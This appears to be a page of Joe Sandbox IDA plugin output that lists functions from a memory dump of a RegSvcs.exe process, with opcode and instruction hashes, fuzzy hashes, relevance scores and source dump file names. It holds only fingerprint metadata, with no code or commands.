Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_13f0000_RegSvcs.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: f9143dc9ab32c0c56755980999bbdd100a6c23c33ec6549c8632214e05dba9ed
Instruction ID: b5bf0fa278fe4f8b76c6684a5bc274d0b7e82616b51d787de2e1ed27bbaef121
Opcode Fuzzy Hash: f9143dc9ab32c0c56755980999bbdd100a6c23c33ec6549c8632214e05dba9ed
Instruction Fuzzy Hash: 7E517E75A00215CFCB15CF59C480AAEFBB1FF84710F2881AAD915EB361D770AE42CB90

Function 01426154 Relevance: .1, Instructions: 133COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000A.00000002.1653532342.00000000013F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 013F0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_13f0000_RegSvcs.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 347dc5a723645e59dedc5e75ba355522297e0888c290f7f06f5f18bbc7ebfe9b
Instruction ID: 9341e5536894cbcc3bd3cac4ced69abc9dddc1ec8155343d6980511ca709c908
Opcode Fuzzy Hash: 347dc5a723645e59dedc5e75ba355522297e0888c290f7f06f5f18bbc7ebfe9b
Instruction Fuzzy Hash: 65510870900226DBEB26AF28CC40BA9B7B1FF25314F1542ABD925973E1DB7499C1CF90

Function 01420BCD Relevance: .1, Instructions: 130COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000A.00000002.1653532342.00000000013F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 013F0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_13f0000_RegSvcs.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 4e7129b216425a8f01b5f6c30e9f587253278b9c26685229aba02031d6d5f97f
Instruction ID: e1fd427e8b1f31559997fbcb1b728a46663a9ca277cfe888fa4ebb07085597f0
Opcode Fuzzy Hash: 4e7129b216425a8f01b5f6c30e9f587253278b9c26685229aba02031d6d5f97f
Instruction Fuzzy Hash: AF41C271A002299BDB21DF29C940BEA77B8AF59700F4100ABE908AB361D774DE81CB91

Function 01420D59 Relevance: .1, Instructions: 130COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000A.00000002.1653532342.00000000013F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 013F0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_13f0000_RegSvcs.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: daa5003547e808211d5c3733bf25172dd585bd295d0b19c33876551c6abff58a
Instruction ID: 47cfb2603e55237c02d230699cfe955d247e031e6ddebe0ccf6b80da26d43326
Opcode Fuzzy Hash: daa5003547e808211d5c3733bf25172dd585bd295d0b19c33876551c6abff58a
Instruction Fuzzy Hash: 9D41E4716003249FEB22DF25CC40FABBBE9AB65654F40049BF9459B2A1D770EDC4CB52

Function 014E866E Relevance: .1, Instructions: 129COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000A.00000002.1653532342.00000000013F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 013F0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_13f0000_RegSvcs.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 52a1741bb7668dbd0e330b4cee233e7836a49f18a3e4eafb0fad66dd8014cf6e
Instruction ID: 8a238c20c994d383c5668967b7e8655a4efe9d36095fec865efddc6b4a0798b8
Opcode Fuzzy Hash: 52a1741bb7668dbd0e330b4cee233e7836a49f18a3e4eafb0fad66dd8014cf6e
Instruction Fuzzy Hash: 3B419675B00107ABDF15DFA9CC88AAFBBFAAF94601F14406AE944A7361D670DD11CB50

Function 01420887 Relevance: .1, Instructions: 128COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000A.00000002.1653532342.00000000013F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 013F0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_13f0000_RegSvcs.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: edb0b1db513ad8980d53beb281ba49c2ba303e0230cf38a0a802df9483e736bd
Instruction ID: 2bbbe4ee7b271c97f5236cc571187a3461805968ae0d9c060ccae3871ee6e37d
Opcode Fuzzy Hash: edb0b1db513ad8980d53beb281ba49c2ba303e0230cf38a0a802df9483e736bd
Instruction Fuzzy Hash: 4541B1B16007119FE325CF29C480A23B7F9FF99314B544A6FE55787A60E770E886CB90

Function 0144A470 Relevance: .1, Instructions: 127COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000A.00000002.1653532342.00000000013F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 013F0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_13f0000_RegSvcs.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: cfa6bbe05b0a229848395c8ad8c02851ec4b61662f68493760ed8cf14bdab30f
Instruction ID: 34b13fd6c932e1694df70cc4660bb79eea68bbb90486d61a94d7123506e0df49
Opcode Fuzzy Hash: cfa6bbe05b0a229848395c8ad8c02851ec4b61662f68493760ed8cf14bdab30f
Instruction Fuzzy Hash: BA41C432980205CFEB21DF68C554BEE7BB0FB58314F25016BD422BB3A5DB349945DB94

Function 01428BF0 Relevance: .1, Instructions: 124COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000A.00000002.1653532342.00000000013F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 013F0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_13f0000_RegSvcs.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 0280301313aa696977fee476fb2e8de8393c7cd8bd41cbd68b781a7a9d5cc3c1
Instruction ID: 5ee280d2fd9461dcc8a677eb5512463eb3206580be739d8a5fb948d3ac259861
Opcode Fuzzy Hash: 0280301313aa696977fee476fb2e8de8393c7cd8bd41cbd68b781a7a9d5cc3c1
Instruction Fuzzy Hash: CC410271900212CBD7259F5AC880A6EBBF1FBA8714F55802FD9219B365C775D886CB90

Function 01418918 Relevance: .1, Instructions: 123COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000A.00000002.1653532342.00000000013F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 013F0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_13f0000_RegSvcs.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: cde00edd5a3b1f3fb7cca5e971f07674ef3e207cc66dcc5849eb7721064dfe5a
Instruction ID: 85e530bb36896a45b9193e5b68b0da5aa9e3e06c18f13ffe6251cc06228c1c2a
Opcode Fuzzy Hash: cde00edd5a3b1f3fb7cca5e971f07674ef3e207cc66dcc5849eb7721064dfe5a
Instruction Fuzzy Hash: D64129715187469FE312DF698840AABF6E9EF98B54F40092FF984D7260E730DE058B93

Function 0141A020 Relevance: .1, Instructions: 122COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000A.00000002.1653532342.00000000013F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 013F0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_13f0000_RegSvcs.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 165ca662f4b1c8196e57a2c4173bd848e06efaa623a98917432a96e6c9651090
Instruction ID: e562bb11a6bd45a022f82027be34d5e35d0bbd89a940423d806f367516dac3bb
Opcode Fuzzy Hash: 165ca662f4b1c8196e57a2c4173bd848e06efaa623a98917432a96e6c9651090
Instruction Fuzzy Hash: 0A418A71A01251DBDB21DE2D84607FBBFB1EBA0B54F25806BE945CB368D6338D80CB90

Function 014209AD Relevance: .1, Instructions: 122COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000A.00000002.1653532342.00000000013F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 013F0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_13f0000_RegSvcs.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 153c12d01101ae45583c9393fd5c60a3a3529f0513dbb36b6855e9888eadcc81
Instruction ID: c2687beb0b063ccefb8493f12212b92dfded8171ede72cc89f03cf07949c1d37
Opcode Fuzzy Hash: 153c12d01101ae45583c9393fd5c60a3a3529f0513dbb36b6855e9888eadcc81
Instruction Fuzzy Hash: C4415971601611EFD721DF19C840B66BBF4FF68314FA4866BE449CB361E771E9828B90

Function 01450710 Relevance: .1, Instructions: 121COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000A.00000002.1653532342.00000000013F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 013F0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_13f0000_RegSvcs.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: cfe855aa5370e709d3beaf8d0a0824e85895befd2a0058a9eb758e5aacecaf96
Instruction ID: f18817607a1cae3885bb4fd32f235fd83ada6692f2a427ed5a3843d6dd7686ba
Opcode Fuzzy Hash: cfe855aa5370e709d3beaf8d0a0824e85895befd2a0058a9eb758e5aacecaf96
Instruction Fuzzy Hash: 67413975A00605EFDB64CF99C980EAABBF4FF18704B10496EE956D7261D330EA44CF50

Function 0142262C Relevance: .1, Instructions: 119COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000A.00000002.1653532342.00000000013F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 013F0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_13f0000_RegSvcs.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 66cf9739765631d2e49872a8b1648b01a74761b6e8a3f12155b008e2f8068c28
Instruction ID: a2269e1d6ff426457d57d596b53d214d4bceaf68d5657af5dd51bafb2959e231
Opcode Fuzzy Hash: 66cf9739765631d2e49872a8b1648b01a74761b6e8a3f12155b008e2f8068c28
Instruction Fuzzy Hash: A0418D71505711DFC722EF29C940A55B7F1FFA4320F5185AFC41A9B2B1DBB09981CB51

Function 0145C8F9 Relevance: .1, Instructions: 116COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000A.00000002.1653532342.00000000013F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 013F0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_13f0000_RegSvcs.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 7fb9755aa26f0d0b0e829d80e11425ded4e6e2f6d635cb16e4315b6d45f1f166
Instruction ID: 4ea16118a103ffba5933521cfc5c88003db5b0fcc96ea14a4c9c55112f83b7ca
Opcode Fuzzy Hash: 7fb9755aa26f0d0b0e829d80e11425ded4e6e2f6d635cb16e4315b6d45f1f166
Instruction Fuzzy Hash: 343158B1A00345DFDB52CF68C480B99BBF4EB19724F2185AED519EB362D3329902CB90

Function 014A07C3 Relevance: .1, Instructions: 114COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000A.00000002.1653532342.00000000013F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 013F0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_13f0000_RegSvcs.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: fdeef7d3dc2a4aca7876d8bd8a7036fef32c6e50088dc2ea9bacd989cb264da2
Instruction ID: 9fcd56dc880fcc8e245826dd0d7fb8b5ea7d74fcf6d33a7f808b73f33db480c8
Opcode Fuzzy Hash: fdeef7d3dc2a4aca7876d8bd8a7036fef32c6e50088dc2ea9bacd989cb264da2
Instruction Fuzzy Hash: DB41AC719083019BD721DF29C844B9BBBE8FF98714F414A2EF9A8D72A1D770D905CB92

Function 014A05A7 Relevance: .1, Instructions: 111COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000A.00000002.1653532342.00000000013F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 013F0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_13f0000_RegSvcs.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 91e35fa663782f019ba40f92606369a40d9779fdb5c262164b066f17404a9db6
Instruction ID: 3e2e7fb62ff6d902dbbb3bb8f1b9d2bc73e0a953415e30d11836f59a2c74399d
Opcode Fuzzy Hash: 91e35fa663782f019ba40f92606369a40d9779fdb5c262164b066f17404a9db6
Instruction Fuzzy Hash: 6C41D3725086419FC320DF29D840A6BB7E9BFE8704F55061EF998877A0E730D914C7A6

Function 01424859 Relevance: .1, Instructions: 111COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000A.00000002.1653532342.00000000013F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 013F0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_13f0000_RegSvcs.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 529b766b5178ef031d566bd44e2a4ea5d05fcdf8eed1873b31997412561e13d8
Instruction ID: 80cd05169bce823e4f900e790d9df30dda49b313d2eee7bd1c84c2d3c61b6d29
Opcode Fuzzy Hash: 529b766b5178ef031d566bd44e2a4ea5d05fcdf8eed1873b31997412561e13d8
Instruction Fuzzy Hash: E341C0313003228BD725DF29D894B2BBBE9EF94360F58442EE6558B3B1DB70D985CB91

Function 014302E1 Relevance: .1, Instructions: 106COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000A.00000002.1653532342.00000000013F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 013F0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_13f0000_RegSvcs.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: d45b632d2c88e3b1d2b0a33d4d0818ae25320c4cce4feeb98528bfb7bef810ab
Instruction ID: 316951b7ff04eca8ad4d092e92b888a046490d5d002a3add25d50c0aa9314cb6
Opcode Fuzzy Hash: d45b632d2c88e3b1d2b0a33d4d0818ae25320c4cce4feeb98528bfb7bef810ab
Instruction Fuzzy Hash: F8312731A04245AFDB229B69CC40B9FBFE8AF68750F04426BF455D7362C7B49885CBA0

Function 014CE3DB Relevance: .1, Instructions: 105COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000A.00000002.1653532342.00000000013F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 013F0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_13f0000_RegSvcs.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 3a0f6c8aeb0c5649b34d19e8eeb829f165b4025210de3ed04d00febdc6e52123
Instruction ID: 0f507bd14f5aac56734cae0f503a5ea8b7374de74ffb1ae10bbfb88758aa66b6
Opcode Fuzzy Hash: 3a0f6c8aeb0c5649b34d19e8eeb829f165b4025210de3ed04d00febdc6e52123
Instruction Fuzzy Hash: FD319835740716ABE7229F568C41F6BBAA8AB59F50F10003EF600BB3A1DBB4DC0187A4

Function 01424260 Relevance: .1, Instructions: 102COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000A.00000002.1653532342.00000000013F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 013F0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_13f0000_RegSvcs.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: eff831578098e7c7bf6ea21a19d79c557e75a72dead134bd6cee6b8155ac5ad0
Instruction ID: 55d75c56a7e4bf17941e9e931028b2ebe03b77ac47487b53b9a0b58db7aa1059
Opcode Fuzzy Hash: eff831578098e7c7bf6ea21a19d79c557e75a72dead134bd6cee6b8155ac5ad0
Instruction Fuzzy Hash: FF418F31200B45DFD722DF29C491BDB7BE9EB59754F05482EE6598B360C7B4E848CB50

Function 0149EB1D Relevance: .1, Instructions: 100COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000A.00000002.1653532342.00000000013F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 013F0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_13f0000_RegSvcs.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: d4dc8bb00ba671041075334ae517dd354d9cdc434214009dbdb4b94a83dae030
Instruction ID: b9fc6ddb3401854c554097d786d509b15a8b010f0feafaa821b1b5ed14170edd
Opcode Fuzzy Hash: d4dc8bb00ba671041075334ae517dd354d9cdc434214009dbdb4b94a83dae030
Instruction Fuzzy Hash: C331C4312416C29BFB22DB5DC948B267FD8BB54744F1D04A6AB85AB7F2DB38D841C220

Function 014E61C3 Relevance: .1, Instructions: 97COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000A.00000002.1653532342.00000000013F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 013F0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_13f0000_RegSvcs.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: a2eeafefab9f71f406085f0449eae680459c466f34a386d1d71cf09d344b592c
Instruction ID: 8cd5b87866c9209ed65100fda55924b30637419205c691163284cb58b854a6b9
Opcode Fuzzy Hash: a2eeafefab9f71f406085f0449eae680459c466f34a386d1d71cf09d344b592c
Instruction Fuzzy Hash: 3531E475A00116EBDB15EF98CC44BAEB7F9FB58741F46416AE900AB254D770ED00CBA0

Function 014C483A Relevance: .1, Instructions: 96COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000A.00000002.1653532342.00000000013F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 013F0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_13f0000_RegSvcs.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 726c8c2d0743479f2bd8043de06baec142a30732b8ad3c2e62ba33a99040f592
Instruction ID: 2c5a148407c2790092a8b8000e31069c459fe123085e236df55bf2f5eb717460
Opcode Fuzzy Hash: 726c8c2d0743479f2bd8043de06baec142a30732b8ad3c2e62ba33a99040f592
Instruction Fuzzy Hash: 71316776A4012DABCF61DF55DD54BDE7BF9AB98710F1400AAE508A7260CA30DE91CF90

Function 0144EB20 Relevance: .1, Instructions: 96COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000A.00000002.1653532342.00000000013F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 013F0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_13f0000_RegSvcs.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: c38cd4d36016f631c96adf868bcaaac919d5ba087e31a0c8099b0f65759d8f5a
Instruction ID: 3e4f3fd253e6b5c143634f5d61d927132be435bb2181519d9838a0d4b4656b19
Opcode Fuzzy Hash: c38cd4d36016f631c96adf868bcaaac919d5ba087e31a0c8099b0f65759d8f5a
Instruction Fuzzy Hash: 4B31C972E00655AFEB21DFA9CC40AAFBBF8FF54750F11442BE516E7260D2749E018BA0

Function 014E60B8 Relevance: .1, Instructions: 95COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000A.00000002.1653532342.00000000013F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 013F0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_13f0000_RegSvcs.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 12737d07548b1cb3f8afaf9623cb565b20675190f6b48aa5d560e06a6ca4da14
Instruction ID: 298b2db2cdbbbedcd9605969304d67d67575be1657e349c3d42f53af7894b108
Opcode Fuzzy Hash: 12737d07548b1cb3f8afaf9623cb565b20675190f6b48aa5d560e06a6ca4da14
Instruction Fuzzy Hash: A831F671640212EBDB13DF9AC854B6FB7F9AFA4315F02006EE505DB362DA70DD018790

Function 014207AF Relevance: .1, Instructions: 95COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000A.00000002.1653532342.00000000013F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 013F0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_13f0000_RegSvcs.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 6b3a60412391e5241ed8fa4e9f3fda8937946d22b00a63e839f6d4255a36dea2
Instruction ID: 6f7a29c10368985ff245d6db31371383f1fc463a80780d3921f33860012e7a0a
Opcode Fuzzy Hash: 6b3a60412391e5241ed8fa4e9f3fda8937946d22b00a63e839f6d4255a36dea2
Instruction Fuzzy Hash: 73310876A04722DBC722DE298880D6B7BE5AFE4650F42452FFD55A7330DA70DC4187D1

Function 01428550 Relevance: .1, Instructions: 94COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000A.00000002.1653532342.00000000013F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 013F0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_13f0000_RegSvcs.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: ef6366ca9fde3134beacfb3c8ca30bb00fe2a443b86038a15edf8912b9dd9e72
Instruction ID: 3e2ddbb070d55e4f42564a58bd1c4c374a949374b2ce950afcd2c8a2d0a5d44f
Opcode Fuzzy Hash: ef6366ca9fde3134beacfb3c8ca30bb00fe2a443b86038a15edf8912b9dd9e72
Instruction Fuzzy Hash: 2A3181B26053128FE721DF19C840B1BBBE5FB98700F45496EEA8497761D7B0E885CB91

Function 0145A6C7 Relevance: .1, Instructions: 92COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000A.00000002.1653532342.00000000013F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 013F0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_13f0000_RegSvcs.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 0db01105071e305578d35fd0a84dce3d89a7587bc94cbde32e7e57e396344d18
Instruction ID: 48529a652b115c9afc02a5f713c414e04681b918121414784e927e6bf86f8201
Opcode Fuzzy Hash: 0db01105071e305578d35fd0a84dce3d89a7587bc94cbde32e7e57e396344d18
Instruction Fuzzy Hash: 7F312DB2B00B01AFD761CF6ADD41B57BBF8BB18650F14052EA99AC7761E630E900CB60

Function 014CEBD0 Relevance: .1, Instructions: 91COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000A.00000002.1653532342.00000000013F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 013F0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_13f0000_RegSvcs.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: e8bad1134d3ce93f144d5b6cebeeb6eba4438c2e35702770e24588776268c9e6
Instruction ID: 4fddbf608da20555c2e1130821a5d4ef70216041a6707510b7397dc67c3abc7f
Opcode Fuzzy Hash: e8bad1134d3ce93f144d5b6cebeeb6eba4438c2e35702770e24588776268c9e6
Instruction Fuzzy Hash: C131CD75509301CFC712DF1AC54081ABFF1FF99A18F4449AEE488AB361D330DA45CB92

Function 0144438F Relevance: .1, Instructions: 89COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000A.00000002.1653532342.00000000013F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 013F0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_13f0000_RegSvcs.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: fffdca62f76573740a371e793a368fd2e0a219efb8c18cd00395b0f66c7de350
Instruction ID: a8d1edf2703930743d42f97ee739f3a9716d562f46eaf70fb3ba2ffa1aa1ef1d
Opcode Fuzzy Hash: fffdca62f76573740a371e793a368fd2e0a219efb8c18cd00395b0f66c7de350
Instruction Fuzzy Hash: 8231F432B002059FE720EFA9C981B6EBBF9EB94304F04843BD515D7260D730D946CB91

Function 0141CB7E Relevance: .1, Instructions: 89COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000A.00000002.1653532342.00000000013F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 013F0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_13f0000_RegSvcs.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 8cd4161f5b4d08ac4698b36444b06603346f514182f58bb0feca1d395408faf4
Instruction ID: 27c33c7082fd01f3215f1356e5e03fe13ac9ce4f3a6cf22ba6b0cc1926220244
Opcode Fuzzy Hash: 8cd4161f5b4d08ac4698b36444b06603346f514182f58bb0feca1d395408faf4
Instruction Fuzzy Hash: 06210436E4125AAADB10DFB98841BEFBBB5AF54740F198037AE15E7360E270CD0187A0

Function 0141C156 Relevance: .1, Instructions: 88COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000A.00000002.1653532342.00000000013F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 013F0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_13f0000_RegSvcs.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: d98e9156f7790f0fe0fdb4ec18f6c90e91fe884f847eab08caa1e52dcec93266
Instruction ID: 068ed8555ee1964eb70fe27ebbdf9e3dc052e4e335fb15a693e30879fae9cd39
Opcode Fuzzy Hash: d98e9156f7790f0fe0fdb4ec18f6c90e91fe884f847eab08caa1e52dcec93266
Instruction Fuzzy Hash: 6C3170B19002118BD731AF58CC40BF9B7B4EF94314F44816FD94A9F3A6DA74D986CB90

Function 014DC3CD Relevance: .1, Instructions: 88COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000A.00000002.1653532342.00000000013F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 013F0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_13f0000_RegSvcs.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 7f3ac7f511b12b6545c220c591282cbbe50732f4b841637f95eeaa606406b8f4
Instruction ID: 20a675dc2303af720d328645cef3d8a71ba94292ad3dd3737c0e95a17f70edc5
Opcode Fuzzy Hash: 7f3ac7f511b12b6545c220c591282cbbe50732f4b841637f95eeaa606406b8f4
Instruction Fuzzy Hash: 9D214F36600652B7CF15AB968C50EBBBBB5EF60710F40802FFA958B6B1E634D944C360

Function 0141E420 Relevance: .1, Instructions: 88COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000A.00000002.1653532342.00000000013F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 013F0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_13f0000_RegSvcs.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 3e03b2163cd6908561d5d08ac9dedd2540df18771d70edace84f27ee89198597
Instruction ID: 375f66ab77db343a3abbd0d7b31115485ed69d645f5c8f4e73110eaae912058d
Opcode Fuzzy Hash: 3e03b2163cd6908561d5d08ac9dedd2540df18771d70edace84f27ee89198597
Instruction Fuzzy Hash: ED31FC35A4011C9BDB32DF19CC41FEEB7B9EB25750F0101A6EA45B72A0D6749E818F90

Function 01454588 Relevance: .1, Instructions: 87COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000A.00000002.1653532342.00000000013F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 013F0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_13f0000_RegSvcs.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 889ecffd1a06a090bd79871a4c0fdf01ee42b751b4f666e31dccfc06bb2b9632
Instruction ID: 987bbf65226fe52c0ce9b8dfed6489fbd43bff627c1869901bde0b03d6c3fbe1
Opcode Fuzzy Hash: 889ecffd1a06a090bd79871a4c0fdf01ee42b751b4f666e31dccfc06bb2b9632
Instruction Fuzzy Hash: EA21B435A00609EFCB50CF59C580A8EBBF5FF58314F54806AEE199F252E674DA418B60

Function 014544B0 Relevance: .1, Instructions: 87COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000A.00000002.1653532342.00000000013F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 013F0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_13f0000_RegSvcs.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 0585018020b518b6eaa8cf9e622f740f6d17bd5dc0d17d02532a793d0030dcdb
Instruction ID: 018da78e54f9b2f59c1ee09f82a13e6b991a13af454dfa7d6b62d2d50ce965a9
Opcode Fuzzy Hash: 0585018020b518b6eaa8cf9e622f740f6d17bd5dc0d17d02532a793d0030dcdb
Instruction Fuzzy Hash: D221D1726047099BCB22DF19C840B6B77E4FB8C764F05451AFE549F252E730E9418BA2

Function 0141E388 Relevance: .1, Instructions: 86COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000A.00000002.1653532342.00000000013F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 013F0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_13f0000_RegSvcs.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 0cf2ef89ce765565c41e30a718174bbd4c2b265194fcbe27392bd3351cdfdb09
Instruction ID: b56ffa5ffa53794e5e2805bf727b96d4cfb00935f229263d7d0a23690f7def00
Opcode Fuzzy Hash: 0cf2ef89ce765565c41e30a718174bbd4c2b265194fcbe27392bd3351cdfdb09
Instruction Fuzzy Hash: 2A318D35600604AFD721CF69C884F6AB7B9EF85354F1445AAE916DB2A5E730ED02CB50

Function 0149E609 Relevance: .1, Instructions: 86COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000A.00000002.1653532342.00000000013F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 013F0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_13f0000_RegSvcs.jbxd

Similarity

API ID:
String ID:
API String ID:
